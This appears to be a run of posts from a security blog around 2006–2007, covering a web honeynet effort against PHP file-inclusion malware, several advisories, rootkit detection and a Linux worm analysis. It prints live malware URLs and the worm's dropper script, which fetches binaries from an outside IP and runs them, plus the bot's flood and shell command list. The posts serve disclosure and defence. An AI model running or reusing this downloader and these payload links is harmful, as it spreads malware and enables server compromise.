important note: the name of the web honeynet project has been changed to the web honeynet task force to avoid confusion with the honeynet project.

[ warning: this post includes links to live web server malware propagated this wednesday via file inclusions exploits. these links are not safe! ]

hello.

the newly formed web honeynet project from securiteam and the isotf will in the next few months announce research on real-world web server attacks which infect web servers with:
tools, connect-back shells, bots, downloaders, malware, etc. which are all cross-platform (for web servers) and currently exploited in the wild.

the web honeynet project will, for now, not deal with the regular sql injection and xss attacks every web security expert loves so much, but just with malware and code execution attacks on web servers and hosting farms.

these attacks form botnets constructed from web servers (mainly iis and apache on linux and windows servers) and transform hosting farms/colos to attackplatforms.

most of these “tools” are being injected by (mainly) file inclusion attacks against (mainly) php web applications, as is well known and established.

php (or scripting) shells, etc. have been known for a while, as well as file inclusion (or rfi) attacks, however, mostly as something secondary and not much (if any – save for some blogs and a few mailing list posts a year ago) attention was given to the subject other than to the vulnerabilities themselves.

the bad guys currently exploit, create botnets and deface in a massive fashion and force isps and colos to combat an impossible situation where any (mainly) php application from any user can exploit entire server farms, and where the web vulnerability serves as a remote exploit to be followed by a local code execution one, or as a direct one.

what is new here is the scale, and the fact we now start engaging the bad guys on this front (which so far, they have been unchallenged on) – meaning aside for research, the web honeynet project will also release actionable data on offensive ip addresses, urls and on the tools themselves to be made availableto operational folks, so that they can mitigate the threat.

it’s long overdue that we start the escalation war with web server attackers, much like we did with spam and botnets, etc. years ago. several folks (andquite loudly – me) have been warning about this for a while, now it’s time to take action instead of talk.

note: below you can find sample statistics on some of the web honeynet project information for this last wednesday, on file inclusion attacks seeding malware.
you will likely notice most of these have been taken care of by now.

the first research on the subject (after looking into several hundred such tools) will be made public on the february edition of the virus bulletin magazine, from:
kfir damari, noam rathaus and gadi evron (yours truly).

the securiteam and isotf web honeynet project is supported by beyond security ( http://www.beyondsecurity.com )..

special thanks (so far) to: ryan carter, randy vaughn and the rest of the new members of the project.

for more information on the web honeynet project feel free to contact me.

also, thanks for yet others who helped me form this research and operations hybrid project (you know who you are).

sample report and statistics (for wednesday the 10th of january, 2007):

ip | hit count | malware (count), … |
195.225.130.118 | 12 | http://m embers.lycos.co.uk/onuhack/cmd1.do? (4),
http://m embers.lycos.co.uk/onuhack/injek.txt? (6),
http://m embers.lycos.co.uk/onuhack/cmd.do? (2),
69.93.147.242 | 11 | http://w ww.clubmusic.caucasus.net/administrator/cmd.gif? (more…)

It appears that new OpenOffice.org security update has been released.

Red Hat adivsory is located here (rated as Important):
https://rhn.redhat.com/errata/RHSA-2007-0001.html

And what the RHSA-2007:0001-3 states:

Several integer overflow bugs were found in the OpenOffice.org WMF file
processor. An attacker could create a carefully crafted WMF file that could
cause OpenOffice.org to execute arbitrary code when the file was opened by
a victim. (CVE-2006-5870)

CVE link listed is not accessible yet.
Update: Link to the CVE.

More details available via Bugzilla Bug 217347 (CVE-2006-5870 WMF heap overflow) opened in November. Related OpenOffice Issue 70042 document opened on 2nd Oct is located at www.openoffice.org/issues/show_bug.cgi?id=70042.
Both 1.1.x and 2.x versions are affected and this patch should be obtained.

These vulnerabilities are reported in OpenOffice prior to version 2.1.0.
The previous remarkable ‘OOo’ update was released in June.

It is not known if the critical .DOC issue, CVE-2006-6561 (so-called 12122006-djtest.doc issue) was fixed now. I believe that the answer is No.

Update: StarOffice versions 6, 7 and 8 are affected too. Link to the short advisory of NGSSoftware:
ngssoftware.com/advisories/high-risk-vulnerabilities-in-the-staroffice-suite/

victor duchovni agreed for me to post what he employs to avoid such issues as the recent bypass attack against anti virus gateway solutions.
this is in some ways similar to a limited application firewall for smtp, which is not spam specific and mime only. yes, i know, smtp application firewalls are the 4th buzzword down the road, give it a couple of years.

victor’s information:

i have a mime normalizer in front of the a/v engine. non-conformant
base64 entities are made conformant or neutered (super-encoded via qp
so that the user receives the base64 text itself as the entity payload).

——–
in:
ct: application/octet-stream
cd: attachment; filename=foo.dat
cte: base64

aa aa
(more…)

shlomi fish discussed on his blog how he discovered a segfault in perl. looks interesting, but we haven’t verified it:

i discovered a segfault in the perl-5.8.x compilation stage. i discovered it by accident: i was refactoring some code, and added a function, and then it segfaulted. after reducing the code to a minimal form that still exhibited the problem, i found it had a syntax error which triggered the segfault.

the following code when run by perl-5.8.x triggers the segfault:

sub
{
my ($i, $j) = @_;
sub { [ $i->f(); ] };
}

it doesn’t segfault perl-5.6.2. since it is also no longer exhibited in bleadperl, it was closed as “resolved”. however, i wrote the following on what should still be done:

1. add this as a test-case to the perl 5 test-suite.
2. write a patch for the perl-5.8.x line. (which is still heavily used).
3. investigate the crash, and see if it poses security risks. (other than the obvious dos that is caused by the segfault of evaluating such code.)

gadi evron,
ge@beyondsecurity.com.

While trying to generate a gpg keypair on a remote server, I discovered I lack entropy. Eventually I had to physically type on the keyboard in order to generate enough random bytes.
A short research led me to the following startling thread in the Linux kernel mailing list; Someone suggested to disable the entropy gathering from network cards: http://marc.theaimsgroup.com/?l=linux-kernel&m=114684809230875&w=2
* Note that in stock kernel version, entropy is still gathered from network cards.

I see this as an extremely bad move. ‘Headless’ servers with no keyboard and mouse have very few ways to create random entropy.
Web servers are an extreme example. There are few disk events that can contribute to the amount of entropy, and on the other hand SSL connection requires a lot of randomness.

This decision, if indeed accepted, is completely absurd. If someone decides to cancel network card as a source to random number generation, at least leave it as an option to the kernel module, a /proc entry or something. Why just diff it out??

To make things worse, Intel used to provide an onboard random number generator. This initiative was torpedoed, and the chip no longer exists in modern boards. There goes another source of random entropy out the window.

Modern day servers requires more sources of entropy than ever. We use VPNs, SSH and HTTPS. Let’s face it, SSL is ubiquitous.

As an example, try to run 4 simultaneous ssh connections to a dedicated web server (for some time, at least 4-5 hours), and try to generate a GPG keypair. 9 out of 10 times you’ll be out of entropy.

Suggested solutions like gathering entropy from the sound card don’t cut it for production servers.
There are the of course the dedicated PCI cards: http://www.broadcom.com/collateral/pb/5802-PB05-R.pdf
http://www.idquantique.com/products/quantis.htm

But then we could also ask for a Schrödinger’s cat that sits in a conveniently located alternate universe to establish SSL handshakes for us.

Attacks on PRNGs are well documented. Today no one believes that clock interrupts are cryptographically random. For example, look at: http://www.gutterman.net/publications/GuttermanPinkasReinman2006.pdf

I would love to hear your opinions and suggestions from security point of view.

rootkit detection has been going on for a long time on linux, far longer than on windows.

often it was just “signature based” such as with chkrootkit, finding already known rootkits. windows rootkit detection tools only showed up in the last couple of years and are more generic in nature, looking at different hooks and signs of foul play. still, they are far from mature and the technology for detection is still behind what the bad guys are using.

zeppoo is a new tool for rootkit detection on linux that works generically, catching up to the windows technology.

on dick’s diary, he writes of this new tool, and says:

a clever tool i’ve been watching for some time called zeppoo has reached a mature release stage today. zeppoo allows the user to detect rootkits on the i386 architecture under linux by using /dev/kmem and /dev/mem. it’s very useful at detecting hidden tasks, modules, syscalls, some corrupted symbols, and hidden connections. anti-rootkits which don’t use these methods can be fooled easily.

you can find more information on zeppoo’s project page here.

zeppoo’s homepage is here.

gadi evron,
ge@beyondsecurity.com.

Systems behind content management system based Web sites are not always patched. Delays when patching systems are not weeks. In fact, they are more than months.

The XML-RPC for PHP vulnerability from June 2005 is not the only security issue being exploited in this new Linux worm case. One of the other vulnerabilities is GLOBALS['mosConfig_absolute_path'] issue CVE -2005-0512, reported and fixed exactly one year ago. This code injection issue affects Mambo systems 4.5.2 and earlier.

At this time, Mambo defacemect reports from volunteers who helped the Internet Storm Center to make a conclusion that a new Plupii variant is spreading. Sometimes even the word ‘mambo’ in the URL helps confirming Mambo sites being as target of defacement; see new ones at www.zone-h.org/en/defacements/view/id=3354748/ etc.

A fixed Mambo version 4.5.2.1 is available, but administrators simply didn’t patched their systems.

like i just wrote to bugtraq on this subject (it’s being discussed there now), indeed, the most annoying thing about the php worms today is that these php vulnerabilities being exploited are everywhere.

as i already mentioned, this recent linux worm has more to it, but that’s in another post.

these vulnerabilities being exploited are very difficult to protect from because:
1. php is the “serious” or at least open-source/linux/security freak’s choice for web development. mine as well (although as many still say, perl does a better job).

2. developing secure applications in php is difficult, as one of php’s creators said recently – even to him after years of trying.

3. staying on top of new php vulnerabilities has become almost impossible, popping around everywhere.

4. determining how secure a php application is, looking at the code and for how silly past vulnerabilities were (i.e. looking at the coder rather than the code) is now more important than the actual application.

much like their self criticism said, php needs to grow to a far more secure language, much like we need to chose more carefully what php software we use.

some of us have been joking for a while about creating a script to choose from different paragraph we create, and email bugtraq re-assembling the randomly with a new php bug and a random php application name every few hours. would any of us be able to readily tell the difference?

from all the fish we can barely see the water.

as to the worms, been going on longer than 2 mounths like the person i was replying to mentioned, but he is correct.

one note i’d like to make, is that even if the second (interesting) payload in the linux worm wasn’t there, just because someone utilizes old malware in the creation of new malware doesn’t mean it is new, or 99.9% of any “virus” ever written would be old.

does bagle.**** ring a bell with anyone?

if any of you are interested in sharing web server logs and be notified of new php problems we all notice online, drop me a note.

gadi evron,
ge@beyondsecurity.com.

the first part of worm is yet another php worm (with drupal, wordpress, etc. attacked).
more information on older versions here:
http://isc.sans.org/diary.php?storyid=823

there is another shell script called gicumz there:

#!/bin/bash
cd /tmp
wget 209.123.16.34/session
chmod +x session
./session
cd /tmp
wget 209.123.16.34/derfiq
chmod +x derfiq
./derfiq

the worm itself that runs on the linux system though, is something new as far as we can tell.

gadi evron,
ge@beyondsecurity.com.

it has just been confirmed the new linux malware is being controlled by a botnet c&c (command & control) server.

efforts are being made to take care of that server and notify the relevant isp’s.

gadi evron,
ge@beyondsecurity.com.

[there are several updates on this subject on the main blogs site]

today, we received a notification about a new linux malware itw (in the wild).

chas tomlin provided shadowserver and nicholas alright who notified the relevant operational communities, with the information on the binaries. he captured them with squil.

chas is working with shadowserver to identify better ways to trackdown/takedown botnets.

the credit should go to him and shadowserver.

shadowserver has been a responsible and essential part of recent internet security activities.

as anti virus vendors have been notified and will soon do a write-up on it, i see no reason not to publicize it here.

md5:
c2576aeff0fd9267b6cc3a7e1089e05d ~/samples/derfiq
e9a2b13fe02d013cc5e11ee586d11c38 ~/samples/session

we are not quite sure as of yet exactly what this does, it can be a linux virus, a linux trojan horse, a linux worm… we are not even sure if the checksums above are useful at all. we hope to know more soon and we will update as we do.

there are some interesting strings to be noted:

notice %s :tsunami     = special packeter that wont be blocked by most firewalls
notice %s :pan         = an advanced syn flooder that will kill most network drivers
notice %s :udp         = a udp flooder
notice %s :unknown     = another non-spoof udp flooder
notice %s :nick        = changes the nick of the client
notice %s :server      = changes servers
notice %s :getspoofs   = gets the current spoofing
notice %s :spoofs      = changes spoofing to a subnet
notice %s :disable     = disables all packeting from this client
notice %s :enable      = enables all packeting from this client
notice %s :kill        = kills the client
notice %s :get         = downloads a file off the web and saves it onto the hd
notice %s :version     = requests version of client
notice %s :killall     = kills all current packeting
notice %s :help        = displays this
notice %s :irc         = sends this command to the server
notice %s :sh          = executes a command

‘session’, current detection:
antivir               6.33.1.50/20060218       found bds/katien.r
avast                 4.6.695.0/20060216       found nothing
avg                   718/20060217             found nothing
avira                 6.33.1.50/20060218       found bds/katien.r
bitdefender           7.2/20060218             found nothing
cat-quickheal         8.00/20060216            found nothing
clamav                devel-20060126/20060217  found nothing
drweb                 4.33/20060218            found nothing
etrust-inoculateit    23.71.80/20060218        found nothing
etrust-vet            12.4.2086/20060217       found nothing
ewido                 3.5/20060218             found nothing
fortinet              2.69.0.0/20060218        found nothing
f-prot                3.16c/20060217           found nothing
ikarus                0.2.59.0/20060217        found backdoor.linux.keitan.c
kaspersky             4.0.2.24/20060218        found backdoor.linux.keitan.c
mcafee                4700/20060217            found linux/ddos-kaiten
nod32v2               1.1413/20060217          found nothing
norman                5.70.10/20060217         found nothing
panda                 9.0.0.4/20060218         found nothing
sophos                4.02.0/20060218          found nothing
symantec              8.0/20060218             found backdoor.kaitex
thehacker             5.9.4.098/20060218       found nothing
una                   1.83/20060216            found nothing
vba32                 3.10.5/20060217          found nothing

‘derfiq’ current detection:
antivir               6.33.1.50/20060218       found worm/linux.lupper.b
avast                 4.6.695.0/20060216       found nothing
avg                   718/20060217             found nothing
avira                 6.33.1.50/20060218       found worm/linux.lupper.b
bitdefender           7.2/20060218             found nothing
cat-quickheal         8.00/20060216            found nothing
clamav                devel-20060126/20060217  found nothing
drweb                 4.33/20060218            found nothing
etrust-inoculateit    23.71.80/20060218        found nothing
etrust-vet            12.4.2086/20060217       found nothing
ewido                 3.5/20060218             found nothing
fortinet              2.69.0.0/20060218        found nothing
f-prot                3.16c/20060217           found nothing
ikarus                0.2.59.0/20060217        found net-worm.linux.lupper.b
kaspersky             4.0.2.24/20060218        found nothing
mcafee                4700/20060217            found nothing
nod32v2               1.1413/20060217          found nothing
norman                5.70.10/20060217         found nothing
panda                 9.0.0.4/20060218         found nothing
sophos                4.02.0/20060218          found nothing
symantec              8.0/20060218             found hacktool
thehacker             5.9.4.098/20060218       found nothing
una                   1.83/20060216            found nothing
vba32                 3.10.5/20060217          found nothing

this write-up can be found here:
http://blogs.securiteam.com/index.php/archives/303

we will notify as we get new updates here:
http://blogs.securiteam.com

gadi evron,
ge@beyondsecurity.com.

the sans isc reported on this:
http://isc.sans.org/diary.php?storyid=1125

two things i’d like to discuss are:
1. how many mailing lists do we have to read?

2. how real security training is done.

and

3. how this linux kernel vulnerability affects you where you may not even realize it.

on the first point – plenty. if you want to be in the security industry, read your favorite blog(s) or stay on 50 mailing lists reading a bunch of cesspool cr*p every day. that’s how it is.

that’s how real training in the security industry is done today. show me an alternative to the wide-range of knowledge, developing security-minded thinking and the right paranoia backed up by wisdom and tech-savvy? as well as knowing the b/s from what’s real.

as to this linux kernel vulnerability… how many of us heard about it? mailing lists are not perfect. however, most of those who would update their machines by now, already did.

what about the machines you can’t update and/or don’t know about?

how many third-party appliances such as application firewalls, i[dp]s systems and other such cr*p do you have on your network or worse – before it, ready to be exploited?

how many of these appliances run linux? how many of them run windows?
how many of them are secure enough to even have basic ports closed?

port scan them and find out.

when was the last time you received a vendor update for the machine itself?

i’d start worrying if i were you. not everything is a dos, and a dos from the entry to your network by one of your own machines is kind of bad, although solvable once you realize what causes it.

gadi evron,
ge@beyondsecurity.com.

Slackware hasn’t been in the spotlight for ages, but before I go into a long rant about how the only Linux I would dare use is Slackware, lets get to the point.

Slackware is known for its security, but as we all know; systems are only as secure as their administrators are paranoid, however, it helps to have good (great) foundation.

Jeffrey Denton (dentonj) has compiled an elaborate tutorial on improving the overall security of Slackware Linux. I’ve known dentonj from IRC for a good bit of time, and though he has kicked me for being a dink a few times, he has my respect. I’ve read through this tutorial and found it up to par for even the most paranoid. Surprisingly enough, most of it I have already done. Other parts I found so ingenious, I had to implement them.

Please take note that dentonj is doing some contract work in Iraq at the moment… or “war driving in the states got boring,” as he put it… so the document is still a work-in-progress.

You can read the document here or here.

(Updated: January 21, 2006 @ 21:19, 21:23)

A security vulnerability in KDE’s JavaScript interpreter allows remote attackers to cause a user visiting a malicious web page to execute arbitrary code by overflowing KJS (KDE-JavaScript) UTF-8 interpreter.

The vulnerability can be triggered by any program that utilizes KJS, i.e. the vulnerability is not limited to Konqueror.

More information to come as technical details start to surface.

Update:
The patch found in ftp://ftp.kde.org/pub/kde/security_patches/post-3.2.3-kdelibs-kjs.diff offers some insight into the problem, the vulnerable JavaScript functions appearently are: encodeURI and decodeURI.

Update 2: The CVE-2006-0019 entry has not be released yet, but keep watching.

The vulnerability recently discovered in Windows, and patched just several days ago has been found to be exploitable on WINE based systems, this also includes Crossover Office package.

According to H D Moore, wine-20050930/dlls/gdi/driver.c includes:

/**************************************************************
Escape [GDI32.@]
*/
INT WINAPI Escape( HDC hdc, INT escape, INT in_count, LPCSTR in_data,
LPVOID out_data )
{
INT ret;
POINT *pt;

switch (escape)
{
case ABORTDOC:
return AbortDoc( hdc );
[ snip ]
case SETABORTPROC:
return SetAbortProc( hdc, (ABORTPROC)in_data );
[ snip ]


And wine-20050930/dlls/gdi/printdrv.c includes:

/**********************************************************
* call_abort_proc16
*/
static BOOL CALLBACK call_abort_proc16( HDC hdc, INT code )
{
ABORTPROC16 proc16;
DC *dc = DC_GetDCPtr( hdc );

if (!dc) return FALSE;
dc->pAbortProc = abrtprc;
GDI_ReleaseObj( hdc );
return TRUE;
}


Finally wine-20050930/dlls/gdi/printdrv.c includes:

/******************************************************************
* EndPage [GDI32.@]
*
*/
INT WINAPI EndPage(HDC hdc)
{
ABORTPROC abort_proc;
INT ret = 0;
DC *dc = DC_GetDCPtr( hdc );
if(!dc) return SP_ERROR;

if (dc->funcs->pEndPage) ret = dc->funcs->pEndPage( dc->physDev );
abort_proc = dc->pAbortProc;
GDI_ReleaseObj( hdc );
if (abort_proc && !abort_proc( hdc, 0 ))
{
EndDoc( hdc );
ret = 0;
}
return ret;
}

As 2005 comes to an end, we can look back and try to use that to guess what we would see in 2006 … but lets first summarize what we had:
1) Over 1500 new vulnerability groups (we call them ‘groups’ since we don’t split an SQL injection and its CSS counterpart into two advisories), which is up by roughly 300 comparing to last year.

2) An uproar in exploits (i.e. advisories with little technical details and the majority of it being a PoC or an actual exploit) from 150 to 295.

3) The number of Microsoft related advisories (not just MSXX-XXX) has jumped from 66 to 133, a little bit more than double.

4) IIS related vulnerabilities have declined from 13 to 8.

5) A decrease in the number of Apache related advisories from 23 to 11.

6) The busiest month was May, with over 170 new articles (roughly 6 articles per day, including the weekends).

So what will 2006 bring? my estimate is that we’ll see MORE vulnerabilities. Why? simply because as more software comes into the consumer market, it is more likely that people will find vulnerabilities in them.

As more Web based products emerge, the number of SQL, Directory Traversal, Cross Site Scripting and the like will become the majority of vulnerabilities, while Buffer Overflows and Format Strings becoming the minority.

The number of “Phishing” attacks will greatly increase, and become a lot more clever as the thieves get smarter and the methods become simpler. “Phishing” will also start utilizing more custom made Spyware and exploits, to try and make the victim believe that they are not being “Phished”.